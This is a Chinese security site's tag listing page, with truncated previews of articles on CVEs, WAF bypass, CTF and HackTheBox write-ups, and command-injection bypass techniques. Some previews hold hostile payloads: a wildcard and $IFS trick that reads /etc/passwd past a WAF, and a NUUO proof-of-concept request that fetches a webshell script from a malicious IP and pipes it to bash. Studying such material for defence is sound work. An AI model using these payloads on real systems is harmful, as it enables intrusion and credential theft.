ifs | CN-SEC 中文网

安全漏洞

F5 BIG-IP rce漏洞 CVE-2025-31644

F5 BIG-IP 系统漏洞 CVE-2025-31644 CVE-2025-31644 原理示意图受影响版本F5 BIG-IP v16.1.4.1漏洞验证过程漏洞详情漏洞特征编号: CVE-2025...

05月15日71 views评论

阅读全文

安全文章

通配符绕过WAF

/usr/bin/cat /etc/passwd == /???/???/c?t$IFS/???/p?s?w?原文始发于微信公众号（Khan安全团队）：通配符绕过WAF

05月15日35 views评论

阅读全文

安全漏洞

核弹级漏洞预警｜NUUO监控设备远程沦陷实录(CVE-2025-1338) POC

0x01 漏洞杀伤链攻击向量： GET /handle_config.php?log=;curl${IFS}http://恶意IP/webshell.sh|bash; HTTP/1.1Host: t...

04月29日108 views评论

阅读全文

安全文章

HTB-CozyHosting 红队靶机三阶渗透思维突破：Cookie伪造+命令注入组合拳

HackTheBox 的 CozyHosting 是一款Linux红队实战靶机，涵盖 Cookie伪造、命令注入、敏感数据查找、密码爆破、sudo提权等红队技术，适合初级选手挑战权限升级完整链条靶机地...

04月21日29 views评论

阅读全文

IoT工控物联网

20块钱的路由器刷机

简介这是一台中国移动定制的ax3000路由器，居然还是Wi-Fi6。凭借低廉的成本往往出现在装宽带赠送和捡垃圾的硬件爱好者手中。一个wan三个lan，一个reset孔和一个mesh按钮，可玩性算中等。...

04月16日38 views评论

阅读全文

CTF专场

【buuctf】Web攻防(二)

众生度尽，方证菩提[ACTF2020 新生赛]Include访问urlhttp://42675000-beb8-4770-9107-0954c486629c.node3.buuoj.cn/首页如下：点...

04月10日24 views评论

阅读全文

安全文章

安全设备漏洞 Checklist

弯刀划过红玫瑰，爱我yao家英雄会2024年最后一个有可能一举翻身的机会安全设备漏洞 Checklist【免责声明】本项目所涉及的技术、思路和工具仅供学习，任何人不得将其用于非法用途和盈利，不得将其用...

12月16日22 views评论

阅读全文

安全文章

baijiacms漏洞验证

baijiacms后台RCE项目地址：https://github.com/baijiacms/baijiacmsV4版本：V4.1.4 20170105 FINAL 环境：php 5.5.38ngi...

12月06日40 views评论

阅读全文

安全文章

命令执行漏洞绕过方法总结

命令执行漏洞绕过方法总结操作系统管道符Windows系统管道符| :直接执行后面的语句,|前面的命令结果作为后面命令的参数|| :前面的命令执行成功，则后面的命令不会执行；前面的命令执行失败，则后面...

11月22日22 views评论

阅读全文

绕过Linux系统限制

常见限制绕过反向 Shell# Double-Base64 is a great way to avoid bad characters like +, works 99% of the timeec...

11月10日安全文章31 views评论

阅读全文

安全新闻

【PoC】Synology TC500 和 BC500 摄像头存在严重漏洞，可获取 Shell

https://www.synacktiv.com/publications/exploiting-a-blind-format-string-vulnerability-in-modern-bina...

11月01日70 views评论

阅读全文

安全博客

命令执行

命令执行 # 以下介绍为 PHP 环境用于命令执行的函数有 system exec passthru shell_exec 1234一些常见的绕过方法 # 命令拼接以及 %0a %0d \n 12...

10月15日17 views评论

阅读全文

在线咨询

微信